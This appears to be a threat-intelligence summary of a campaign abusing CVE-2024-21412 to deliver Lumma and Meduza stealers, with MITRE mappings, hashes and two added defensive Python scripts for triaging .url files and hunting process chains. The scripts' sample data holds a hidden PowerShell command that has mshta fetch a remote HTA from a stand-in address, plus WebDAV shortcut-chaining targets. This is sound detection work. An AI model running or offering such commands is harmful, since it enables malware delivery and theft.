Increase in the exploitation of Microsoft SmartScreen vulnerability CVE-2024-21412

Cyble Research and Intelligence Labs (CRIL) reports an active campaign exploiting CVE-2024-21412 to bypass Microsoft Defender SmartScreen and deliver Lumma Stealer and Meduza Stealer payloads. The attack chain starts from internet shortcut (.url) files hosted on WebDAV, then moves through multi-stage delivery with PowerShell, mshta, and DLL sideloading to evade defenses; observed targets are in Spain, the US, and Australia. #CVE-2024-21412 #SmartScreen #WebDAV #Lumma #MeduzaStealer #DarkGate #WaterHydra

Keypoints

  • Active campaign exploits CVE-2024-21412 to bypass SmartScreen and deploy payloads via internet shortcut (.url) files.
  • Campaign targets Spain, the US, and Australia with lures tied to healthcare, transportation, and Medicare-related documents.
  • Infection chain starts with a spam email linking to a WebDAV-hosted .url file, which then triggers a malicious LNK file.
  • Multi-stage delivery uses forfiles.exe, PowerShell, mshta, and embedded JavaScript to download and execute final payloads.
  • Final payloads include Lumma Stealer and Meduza Stealer, delivered through DLL sideloading of IDATLoader, which injects the stealer into explorer.exe.
  • Victimology covers Spanish taxpayers, transportation firms, and Australian recipients of Medicare-themed lures.
  • MITRE-aligned techniques include phishing, PowerShell, mshta use, DLL sideloading, process injection, and C2 via application-layer protocols.
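
The first link in the chain above is an internet shortcut whose target is another shortcut on a remote WebDAV host, which is the pattern that defeated SmartScreen in CVE-2024-21412. The following triage script is an added example for this summary, not code from the Cyble write-up: it parses a .url file, resolves the URL= (and IconFile=) target to a host and path, and flags a remote .url/.lnk target and the host@port WebDAV host form. The sample files are constructed with RFC 5737 documentation addresses, not campaign artefacts.

```python
"""Triage Windows internet shortcut (.url) files for the shortcut-chaining
pattern behind CVE-2024-21412: a .url whose target is another shortcut
(.url or .lnk) on a remote WebDAV/SMB host, which Windows followed without
the Mark-of-the-Web check that would otherwise have raised SmartScreen.
Added example, not code from the Cyble write-up. The sample files are
constructed (RFC 5737 documentation addresses), not campaign artefacts."""
import configparser
import re
from urllib.parse import urlparse

SHORTCUT_EXT = (".url", ".lnk")
# host@80 and host@SSL@443 are the WebDAV host forms the Windows WebClient
# mini-redirector accepts in UNC and file:// targets.
WEBDAV_HOST = re.compile(r"^[^@\\/]+@(SSL@)?\d+$", re.IGNORECASE)
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}


def read_fields(text):
    """Parse the [InternetShortcut] section into a dict (keys lower-cased)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return dict(cp[section])
    return {}


def split_target(value):
    """Return (host, path) for a URL= or IconFile= value; host '' means local."""
    target = value.strip().strip('"')
    if target.startswith("\\\\"):                # UNC: \\host\share\file
        host, _, rest = target[2:].partition("\\")
        return host, "\\" + rest
    parsed = urlparse(target)                    # file:///C:/x -> netloc ''; file://host/x -> 'host'
    return parsed.netloc, parsed.path


def triage(text):
    """Classify one .url file: target, host, remote flag and a list of findings."""
    fields = read_fields(text)
    url = fields.get("url")
    if url is None:
        return {"target": None, "host": "", "remote": False,
                "findings": ["no URL= field in [InternetShortcut]"]}
    host, path = split_target(url)
    remote = host.lower() not in LOCAL_HOSTS
    findings = []
    if WEBDAV_HOST.match(host):
        findings.append("WebDAV host@port target form")
    if path.lower().rstrip("/\\").endswith(SHORTCUT_EXT):
        if remote:
            findings.append("remote shortcut chain: CVE-2024-21412 SmartScreen bypass pattern")
        else:
            findings.append("local shortcut chain (unusual, review)")
    icon = fields.get("iconfile")
    if icon and split_target(icon)[0].lower() not in LOCAL_HOSTS:
        findings.append("IconFile on remote host (forces outbound auth, staging indicator)")
    return {"target": url.strip().strip('"'), "host": host,
            "remote": remote, "findings": findings}


# Constructed samples, not real campaign files.
SAMPLE_CHAIN = r"""[InternetShortcut]
URL=file://192.0.2.10@80/DavWWWRoot/Medicare-statement.url
IconIndex=13
IconFile=C:\Windows\System32\SHELL32.dll
"""
SAMPLE_UNC = r"""[InternetShortcut]
URL=\\198.51.100.7@SSL@443\DavWWWRoot\invoice.lnk
"""
SAMPLE_BENIGN = r"""[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for name, sample in (("chain", SAMPLE_CHAIN), ("unc", SAMPLE_UNC), ("benign", SAMPLE_BENIGN)):
        result = triage(sample)
        print(name, result["host"] or "(local)", result["findings"])
```

Run it over every .url attachment or download your mail gateway quarantines; the remote-shortcut finding is the one that maps to this CVE, while the IconFile check is a general red flag for shortcut files that is worth keeping in the same triage pass. A benign https:// shortcut produces no findings at all.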

MITRE Techniques

  • [T1566.002] Phishing – ‘Spear phishing emails with a malicious link’ – The infection starts with a spam email that appears to come from a trusted source. The attacker uses a malicious link to lure victims.
  • [T1190] Exploits – ‘Exploit Public-Facing Application’ – The campaign exploits CVE-2024-21412 (an Internet Shortcut Files security feature bypass) to evade SmartScreen and execute payloads. Note that the bug is triggered client-side when the victim opens the shortcut, so T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass) and T1204.002 (User Execution: Malicious File) describe it more precisely than T1190.
  • [T1059] Command and Scripting Interpreter – ‘PowerShell scripts are executed’ – PowerShell (T1059.001) and embedded JavaScript (T1059.007) are used to fetch and run later stages of the infection chain.
  • [T1218.005] System Binary Proxy Execution: Mshta – ‘Abuse mshta.exe to proxy execution of malicious hta file’ – mshta is used to run embedded or downloaded scripts.
  • [T1036] Masquerading – ‘Double extension is used for masquerading’ – Dropped files carry a double extension (T1036.007) so that the real, executable extension is hidden by Explorer's default setting of hiding known extensions.
  • [T1027] Obfuscated Files or Information – ‘Obfuscated PowerShell and JavaScript are used’ – Scripts/components are obfuscated to evade detection.
  • [T1574.002] DLL Side-Loading – ‘TAs execute their own malicious payloads by side-loading DLLs’ – The threat actors place a malicious DLL beside a legitimate, typically signed, executable so that the trusted binary loads the attacker's code instead of the library it expects.
  • [T1055] Process Injection – ‘Injects malicious content into Explorer.exe process’ – Payload is injected into a legitimate process for stealth.
  • [T1071] Application Layer Protocol – ‘Stealer communicates with the C&C server’ – Final payload communicates with C2 over application-layer protocols.
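
The execution techniques above chain together as forfiles.exe launching PowerShell, which launches mshta.exe against remote content. The hunting script below is an added example, not Cyble's detection content: it walks a set of process-creation events of the kind Sysmon Event ID 1 or EDR telemetry provides and alerts on forfiles /c proxy execution, anything spawned by forfiles.exe, mshta.exe with a remote target, and any ancestry of three or more proxy binaries rooted in forfiles.exe. The events, PIDs, paths and the 203.0.113.5 address are constructed for illustration.

```python
"""Hunt for the LOLBin proxy chain described above (forfiles.exe launching
PowerShell, which launches mshta.exe against remote content) in process
creation telemetry such as Sysmon Event ID 1 or EDR process events.
Added example, not Cyble's detection content; the events, PIDs, paths and
the 203.0.113.5 address are constructed for illustration."""
import re

# Binaries that proxy execution in this chain (plus the usual script hosts).
PROXY_BINARIES = {"forfiles.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                  "cmd.exe", "wscript.exe", "cscript.exe"}
# http(s) URLs or WebDAV UNC paths (\\host@80\...) on a command line.
REMOTE_RE = re.compile(r"(https?://|\\\\[^\s\\]+@(ssl@)?\d+\\)", re.IGNORECASE)
FORFILES_C = re.compile(r"(^|\s)/c\s", re.IGNORECASE)

# Constructed events: (pid, ppid, image path, command line). Not real telemetry.
EVENTS = [
    (4000, 800,  r"C:\Windows\explorer.exe", "explorer.exe"),
    (4120, 4000, r"C:\Windows\System32\forfiles.exe",
     r'forfiles.exe /p C:\Windows /m write.exe /c "powershell -w hidden -ep bypass -c mshta http://203.0.113.5/s.hta"'),
    (4136, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -ep bypass -c mshta http://203.0.113.5/s.hta"),
    (4150, 4136, r"C:\Windows\System32\mshta.exe", "mshta http://203.0.113.5/s.hta"),
    (5000, 4000, r"C:\Windows\System32\cmd.exe", "cmd /c dir"),          # benign
    (5100, 5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell Get-Process"),                                         # benign
]


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """pid -> (ppid, image name, command line)."""
    return {pid: (ppid, image_name(image), cmdline) for pid, ppid, image, cmdline in events}


def ancestry(tree, pid):
    """Image names from pid up to the first unknown parent (self first)."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        ppid, name, _ = tree[pid]
        chain.append(name)
        pid = ppid
    return chain


def hunt(events):
    """Return (pid, reason) alerts for the forfiles -> PowerShell -> mshta chain."""
    tree = build_tree(events)
    alerts = []
    for pid, (ppid, name, cmd) in tree.items():
        parent = tree[ppid][1] if ppid in tree else ""
        if name == "forfiles.exe" and FORFILES_C.search(cmd):
            alerts.append((pid, "forfiles.exe /c used to proxy execution"))
        if parent == "forfiles.exe":
            alerts.append((pid, "%s spawned by forfiles.exe" % name))
        if name == "mshta.exe" and REMOTE_RE.search(cmd):
            alerts.append((pid, "mshta.exe loading remote content"))
        chain = ancestry(tree, pid)
        lolbins = [n for n in chain if n in PROXY_BINARIES]
        # Three or more proxy binaries in the ancestry, rooted in forfiles, is the
        # chain in this campaign; a plain cmd -> powershell pair is left alone.
        if len(lolbins) >= 3 and "forfiles.exe" in lolbins:
            alerts.append((pid, "LOLBin chain: " + " <- ".join(chain)))
    return alerts


def flagged_pids(events):
    """Set of PIDs that produced at least one alert."""
    return {pid for pid, _ in hunt(events)}


if __name__ == "__main__":
    for pid, reason in hunt(EVENTS):
        print(pid, reason)
```

The parent/child rules fire on the individual hops, and the ancestry rule ties them together so the mshta.exe event is reported with its full lineage; the benign cmd.exe to powershell.exe pair in the sample data stays silent.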

Indicators of Compromise

  • [SHA256] Malicious LNK files from this campaign – 58e2b766dec37cc5fcfb63bc16d69627cd87e7e46f0b9f48899889479f12611e, 268a0de2468726a106fd92563a846e764f2ba313e37b5fc0cf76171b0a363f6f, and 7 more hashes

Read more: https://cyble.com/blog/increase-in-the-exploitation-of-microsoft-smartscreen-vulnerability-cve-2024-21412/